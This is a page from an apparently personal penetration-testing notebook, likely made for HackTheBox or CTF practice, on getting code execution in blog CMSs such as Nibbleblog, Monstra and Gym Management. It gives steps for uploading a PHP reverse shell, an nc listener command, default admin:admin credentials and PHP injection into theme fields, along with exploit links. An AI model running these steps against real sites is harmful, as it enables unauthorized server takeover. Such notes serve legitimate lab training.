Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Priority
  • REF
  • Nibbleblog
  • Monstra
  • Gym Management

Was this helpful?

  1. 04 WebApps

Blogs

PreviousApacheNextColdfusion

Last updated 2 years ago

Was this helpful?

Priority

  • Extends > Themes "Helloworld" > Save

  • System > Backup > Content > Files > Save something

  • System > Settings > Maintenance Mode <?php phpinfo(); ?> ..Save

  • Plugins are often exploitable

  • searchsploit

  • github 'issues'

REF

  • - Also has webapp/cms/scanner

Nibbleblog

  • Obtain Admin credentials > Activate My image plugin by visiting

  • Upload PHP shell, ignore warnings Visit

  • No matter what you NAME the php upload.. it will ALWAYS be "image.php" after uploading

Setup reverse.php
Upload: "reverse.php" with my IP

Execute:
http://10.129.1.135/nibbleblog/content/private/plugins/my_image/image.php

nc -nvlp 4444
Connected!

Monstra

  • TartarHTB

Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/

admin:admin  ..default works!

Try to edit themes! 
They are often php

Monstra > Extends > Themes
"Helloworld" > Save ..fails

System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails

System > Settings > Maintenance Mode
<?php phpinfo(); ?>   ..Save Fails
Hello                 ..Save Fails

-----------------------
-----------------------
searchsploit monstra
github monstra > Issues > 
php code execution
Look for sqli or lfi

Gym Management

REF: Redteam CTF Defcon Pivonka found this vuln on his own! Actually a pubic/known exploit

DirbNiktoWP
https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html
http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
http://localhost/nibbleblog/content/private/plugins/my_image/image.php
https://www.exploit-db.com/exploits/48506
https://github.com/ratik92/gymmanagementsystem
https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromjpeg
https://medium.com/@asdqwedev/remote-image-upload-leads-to-rce-inject-malicious-code-to-php-gd-image-90e1e8b2aada
https://gist.github.com/asdqwe3124/e63eba35dc8e6976af97f1a9348b277b